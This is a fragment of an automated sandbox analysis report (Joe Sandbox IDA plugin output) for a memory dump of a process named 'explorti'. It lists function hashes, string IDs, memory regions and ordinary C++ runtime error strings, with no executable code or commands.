                    • API ID:
                    • String ID: list too long$eBs
                    • API String ID: 0-3523464180
                    • Opcode ID: 5fa92d662514bde3df7d36c90c603b50f342826358d2375fe2ade0276f243d35
                    • Instruction ID: 4409b00008d4d40a904345bff982cf55dffa7f5e66e29bb7c40ff6ec6e21bb4c
                    • Opcode Fuzzy Hash: 5fa92d662514bde3df7d36c90c603b50f342826358d2375fe2ade0276f243d35
                    • Instruction Fuzzy Hash: FF61B3B0D0435DABDB21DF64CD45BAAF7B4EF05700F1052AAE90CAB281EB74AA41CB55
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"D$`'D
                    • API String ID: 3903695350-755280474
                    • Opcode ID: d7917880fc889d0edd0e4f6727f0be155554c63d38b9a690f4340e06f91866f6
                    • Instruction ID: 92f6f20f9bed09e5d353476ad8f3eb4dc72acd0aecaeb97ffc5a113bb6479777
                    • Opcode Fuzzy Hash: d7917880fc889d0edd0e4f6727f0be155554c63d38b9a690f4340e06f91866f6
                    • Instruction Fuzzy Hash: B631CE716003089FEB21AE7AD905BC773E9AF10310F14446BE45ADB291EB79ECD98758
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E2A63
                    Strings
                    • This function cannot be called on a default constructed task, xrefs: 003E2A43
                    • eBs, xrefs: 003E2A36
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: This function cannot be called on a default constructed task$eBs
                    • API String ID: 2659868963-665623033
                    • Opcode ID: 803deac2f624befb8acaf1480e63561b2b58da0165319926b9dd2b81be40fc46
                    • Instruction ID: d321fbafe641f02f547baf04b61015936b483d4f59bbd5b810c2c70580ce3f8a
                    • Opcode Fuzzy Hash: 803deac2f624befb8acaf1480e63561b2b58da0165319926b9dd2b81be40fc46
                    • Instruction Fuzzy Hash: 9DF02B70A1030CABCB14DF68D8419EEF7FC9F15300F1082AEF804A7200EB70AA54CB99
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 003EE3D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_
                    • String ID: invalid stoi argument$eBs
                    • API String ID: 909987262-2681285792
                    • Opcode ID: d27b0445b6294fb5955e25f3baf3ab48a71975a2bd9d357ad16639d58aff8874
                    • Instruction ID: 7e4aa983fadd502483b689ea0e6a73f13af8114f75a62e12359ff94583ce3875
                    • Opcode Fuzzy Hash: d27b0445b6294fb5955e25f3baf3ab48a71975a2bd9d357ad16639d58aff8874
                    • Instruction Fuzzy Hash: 16F0F032A003249BD730AF699D02A6773E8DB46711F11093AFA109B691EBB07840C7AB